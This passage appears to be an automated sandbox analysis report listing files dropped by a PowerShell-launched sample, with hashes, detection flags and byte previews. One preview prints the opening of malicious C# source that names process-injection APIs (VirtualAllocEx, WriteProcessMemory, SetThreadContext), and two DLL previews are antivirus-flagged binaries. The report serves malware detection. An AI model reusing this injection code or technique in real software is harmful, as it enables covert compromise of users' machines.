                                                                                              SSDEEP:192:GRH6HN4QhfNQ8q8888yYAdpRjOaAUxRa95MqBY3eN450:RNxNp9On+a95MqjS50
                                                                                              MD5:2E07277329D975F7E278EA7E34481FC1
                                                                                              SHA1:AD109EF031CB7A5E0631D021DD9DA967BD5C274C
                                                                                              SHA-256:3D83440538158BB38987574760C05745B31C219634728AF8D75EC24D242A12ED
                                                                                              SHA-512:12EFBCBD2F49C202B3A4192E33427BC2A34C2262C3E8A094B8F66EA8C3C6AC81ED5303A9592F62202601AEEF54CF3CA509EC6E7E82D3009C5D0A9A125865E704
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5og...........!.................<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................<......H........%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..:........e...+X......YE................................................+....+....,..?.+...+...+......X...2...8..............................(....(....}....~....r...pr...p~....~..... ....~.........o3.......-.s....z..<

                                                                                              C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.out

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):702
                                                                                              Entropy (8bit):5.275776010812187
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:KJN/qR37L/6KRf5f/qQf5f/2KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBqdn6KRfZ/FfZ/2Kax5DqBVKVrdFAw
                                                                                              MD5:F196660A24E948E24B6F36D978436749
                                                                                              SHA1:A4F89B44B9E8A0D5DEC07E3D6180A4CD1D75EEE3
                                                                                              SHA-256:FA10E00D7D2A119DD783E7F49B8442EA923440B46969E14C24C87EFB8CFF01D4
                                                                                              SHA-512:7AD7CC52A37348A54475A89E92082C2D14FC923AE88B30C43B69883160239B290A75DB84C60236DD3C4AD563782145AF2F129FCE240799DBC549CE764BE1E941
                                                                                              Malicious:false
                                                                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                              C:\Users\user\AppData\Local\Temp\1yj35v5c\CSC1D664DFBC1CF4D3B97F036955FDEE5EE.TMP

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              File Type:MSVC .res
                                                                                              Category:dropped
                                                                                              Size (bytes):652
                                                                                              Entropy (8bit):3.132933536665914
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygbak7YnqqDUPN5Dlq5J:+RI+ycuZhNkakSwPNnqX
                                                                                              MD5:E4E37ED2597B2A51ABA4AF7B90FE7A3E
                                                                                              SHA1:A5689306E43A96B92CD9587BA5A0AE129395BCC7
                                                                                              SHA-256:64B62A6D69CF34234733946D1FA32D49F1287396FEB0F0A697FF18C774472599
                                                                                              SHA-512:55A8CE9D0A510A3A6791E48D06FFC6D9264097D755CC6A4295C5CF2E9ED388A223510ABBCB0E8C957EA6CDD7369BA3876DE67EA8F800602EBDB370809B373CD2
                                                                                              Malicious:false
                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.y.j.3.5.v.5.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.y.j.3.5.v.5.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                              C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.0.cs

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):11063
                                                                                              Entropy (8bit):4.547000581752388
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:2QC2o4mAQgOLocU9wMk2kAt/Z7pu/cuvnzHzrEo66T:2oYLoH97t/Z7pgjvzf5XT
                                                                                              MD5:FAC8F0E634D8D7975A6EDC045D89AE09
                                                                                              SHA1:DD06BCC32B91D9635BFA317A5213E3C5EE86D2A0
                                                                                              SHA-256:6F5BD7F4EE85C3181E111CDC470E434875BADEDC87EFC056B8EDF5CD494FBFB2
                                                                                              SHA-512:C8D77D5FA969CC6668C25331B5933C8B98DEDEF9C2DD9DA345C3CF89D96C05CC20953486E9185390501245A12AFB5CF9F37C1B627AECE6D797F0F354F6E27CD5
                                                                                              Malicious:true
                                                                                              Preview:.using System;..using System.Diagnostics;..using System.IO;..using System.Net;..using System.Runtime.InteropServices;..using System.Threading.Tasks;....public class ClasserPlus..{.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.... public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

                                                                                              C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.cmdline

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):204
                                                                                              Entropy (8bit):5.0543967333315605
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:pAu+H2L/6K2wkn23fxIAt0zxszIwkn23fxIA/Hn:p37L/6KRfmAt0QfmAPn
                                                                                              MD5:63C515F5C98C6A6709AF91DC4669F46C
                                                                                              SHA1:DD1CB895D54E0D14267D45DC61A73CF598C375B9
                                                                                              SHA-256:F21749976D2E932578DB02ACB792609315DF52F7952D6F69B390875C6785962E
                                                                                              SHA-512:96242190C90108A1FEECADEE3A54014B00F550D79798A876F14B42A7AC373B6AA3DA073A9B37F0C0AE53F76ECE9D4BF71338D5A5B26789C606163DB81BC7C46B
                                                                                              Malicious:false
                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.0.cs"

                                                                                              C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.dll

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):9728
                                                                                              Entropy (8bit):4.63294351731549
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:CRH6HN4QhfNQ8q8888yYAd8RjOa3UxRa95MqBYUeN459:lNxN89Oo+a95MqCS59
                                                                                              MD5:D303F3B7A4CEF4E92845AF0001BA88D8
                                                                                              SHA1:9B823F6167BB64FD27F25768A2EF1178C297B007
                                                                                              SHA-256:D312153CC7484C5EF36DDAFC0C003C79B09F3929E4F098043539CB4AD4ED7CD9
                                                                                              SHA-512:DE89063863A933F1CA30BAA4CEFEC78454ECB9D9973421EC1F1E07160570A23A3B1C52840F9B136A5C524A844B2AF320F30A799667AF7CFD6FFB6A26263E10AD
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5og...........!.................<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................<......H........%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..:........e...+X......YE................................................+....+....,..?.+...+...+......X...2...8..............................(....(....}....~....r...pr...p~....~..... ....~.........o3.......-.s....z..<

                                                                                              C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.out

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):702
                                                                                              Entropy (8bit):5.252198366237126
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:KJN/qR37L/6KRfmAt0QfmAPuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBqdn6KRfmAFfmAPuKax5DqBVKVrdFf
                                                                                              MD5:1EEEF94137DC47A726D09DA5BF6C3544
                                                                                              SHA1:7DE4DF221D77769CB626EB03BD1F981FF3F53BB0
                                                                                              SHA-256:CBDEA2117AE9B71EFCAFBC2ECE7C39956BF39DF6EBD9BAC048408828BC06F481
                                                                                              SHA-512:769CAAB3F12D3AEEB67A08037461E60DA3211713C4A469747A8B563CFBEEF98E86D9D021C0C76A5B649AA812B97C6AE72E07E14F8AA46149107243C3BCEF6785
                                                                                              Malicious:false
                                                                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                              C:\Users\user\AppData\Local\Temp\3vvszjlk\CSC1C049BEBEBAF4B45B9D79F1CA1976831.TMP

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              File Type:MSVC .res
                                                                                              Category:dropped
                                                                                              Size (bytes):652
                                                                                              Entropy (8bit):3.121315635362584
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygllGak7YnqqrllXPN5Dlq5J:+RI+ycuZhN6lYakSrlNPNnqX
                                                                                              MD5:7CB69F8ED7B2F1B08130CF2AA90271BE
                                                                                              SHA1:DB0810E499C8B738260A657033196AD95D816A8E
                                                                                              SHA-256:FFC6123C9743E658928D4DC37621A649634875578A944C4D3AD6CF1696E25028
                                                                                              SHA-512:6D9B8018E19D9A9B42AC625C127F88CB21E25F865D31291CA916D24875E98C1C05419698BBACA614B2B0A670CE7A3E809869D305E3E4B74277CF2A5EE8E7718B
                                                                                              Malicious:false
                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.v.v.s.z.j.l.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...3.v.v.s.z.j.l.k...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                              C:\Users\user\AppData\Local\Temp\RES374.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Dec 27 23:19:23 2024, 1st section name ".debug$S"
                                                                                              Category:dropped
                                                                                              Size (bytes):1328
                                                                                              Entropy (8bit):3.9926745498151295
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:HCe9E2+fmpurRfHNwKEbsmfWI+ycuZhN6lYakSrlNPNnqSqd:wmp+JOKPm+1ulta3hqSK
                                                                                              MD5:69D4BBD153FAC637F864AA31FA881B89
                                                                                              SHA1:4B453FE21CB3694103D1B03D83874F3A7736ECEA
                                                                                              SHA-256:BC06CBAE655A9CDDE648B77EDE2EDE8C751F909C9C39B80836505365740E82FE
                                                                                              SHA-512:0A38239A10DB0C508AFDA0637CC3630D0D7B715503B3A984CD5C8C2F5FEB8F2EE685851C11A4B2E6053E9E9551AEA2BBAB52843C900C1184A72EC218D7C2CBB3
                                                                                              Malicious:false
                                                                                              Preview:L....5og.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\3vvszjlk\CSC1C049BEBEBAF4B45B9D79F1CA1976831.TMP...............|.....0.*..q...........3.......C:\Users\user\AppData\Local\Temp\RES374.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.v.v.s.z.j.l.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                              C:\Users\user\AppData\Local\Temp\RESF461.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Dec 27 23:19:19 2024, 1st section name ".debug$S"
                                                                                              Category:dropped
                                                                                              Size (bytes):1328
                                                                                              Entropy (8bit):3.9852805265737694
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:HGe9E2+f7gnUXDfHhBWwKEbsmfII+ycuZhNAGakSRXPNnqSqd:k7gUzxKPmg1ulAGa3RFqSK
                                                                                              MD5:2CD6DAB14580E9298E0E925AD5469E1E
                                                                                              SHA1:337F603B41278D9885BE35C28906CDA212E1674D
                                                                                              SHA-256:D1F92BD119F639A409431C877C1B8B7A2489BE8FCD4D0E928DE04F6FD3B89AEF
                                                                                              SHA-512:97FF2B76D5E7B3EE5B3D495FC4E34FC5B15AB4E06A7C421C118A4517D434FC79F70134EF0C62946A07AF81FA7B08A5C005C239721448622CF2E878AE46E69FC2
                                                                                              Malicious:false
                                                                                              Preview:L....5og.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\wzlesmvi\CSC11B817DA9D55460CBF45133E7BAA649F.TMP.................Q..#P...i..'4G..........4.......C:\Users\user\AppData\Local\Temp\RESF461.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.z.l.e.s.m.v.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                              C:\Users\user\AppData\Local\Temp\RESF462.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Dec 27 23:19:19 2024, 1st section name ".debug$S"
                                                                                              Category:dropped
                                                                                              Size (bytes):1328
                                                                                              Entropy (8bit):4.002801435985318
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:HGe9EuZf/YXDfHhCQwKEbsmfII+ycuZhNXakSJPNnqSqd:DB/YzE/KPmg1ulXa3rqSK
                                                                                              MD5:4449885B2B938D5C9E7553452742683E
                                                                                              SHA1:48546878C0D2E8CB17EFDBE53A272C13AA5932CD
                                                                                              SHA-256:51DB505B71FB7D39D10D5FDABC0DB830A32D7D1D87D5C4675D9E1C263534E6C6
                                                                                              SHA-512:08FE7D8EE4975EEC087C02ED12A2863D0A9530030A9DDC8DA9B34EB9DD2AFF224726021424F8A95FB4C926D2F2C329BCDF934B352612031BBD99CBB13A72248D
                                                                                              Malicious:false
                                                                                              Preview:L....5og.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\xyq5akbp\CSC3C74FAAA7254A90B38FFB13CA21DCB4.TMP................!.3`..~+...Q..J...........4.......C:\Users\user\AppData\Local\Temp\RESF462.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.y.q.5.a.k.b.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                              C:\Users\user\AppData\Local\Temp\RESF463.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Dec 27 23:19:19 2024, 1st section name ".debug$S"
                                                                                              Category:dropped
                                                                                              Size (bytes):1328
                                                                                              Entropy (8bit):3.9999768763669326
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:HGe9E2+fZ7AXDfHhmwKEbsmfII+ycuZhNkakSwPNnqSqd:kOzvKPmg1ulka3oqSK
                                                                                              MD5:64C5F66D9128E76B40136F8D4F6C46D9
                                                                                              SHA1:4A9D053A72227E690C724377E20E8A47203391C2
                                                                                              SHA-256:28064F0A7A59D8DBF737F766750E6569BCFEB614FF3EB32C96581598F80FD796
                                                                                              SHA-512:1FE141AF4567F485818A29CE14C100DDCEC5FFACC23389B031CB71A9D304A220E553A0CB534B0833774BE008A4CCB2DAEEF3BBFE1FED038D705E276A70A1FD20
                                                                                              Malicious:false
                                                                                              Preview:L....5og.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\1yj35v5c\CSC1D664DFBC1CF4D3B97F036955FDEE5EE.TMP.................~.Y{*Q...{..z>..........4.......C:\Users\user\AppData\Local\Temp\RESF463.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.y.j.3.5.v.5.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0exqqbpw.gvj.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4bjcnjkq.wvg.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bhdu4d3w.ewm.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_epyq3bik.glt.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fdna31cu.2yz.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h2gmamim.sa2.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j30nqc2o.fv3.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
